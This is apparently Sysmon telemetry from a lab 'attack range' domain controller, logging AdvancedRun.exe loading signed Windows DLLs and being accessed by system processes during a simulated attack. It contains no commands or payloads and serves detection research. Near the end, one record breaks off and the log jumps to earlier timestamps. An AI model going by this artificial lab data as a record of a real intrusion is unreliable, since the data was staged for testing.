10341000x80000000000000004007639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:53.254{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:53.222{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.222{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004007629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.113{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:53.097{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.004{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.004{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:53.004{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:52.988{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:52.988{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004007614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004007604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
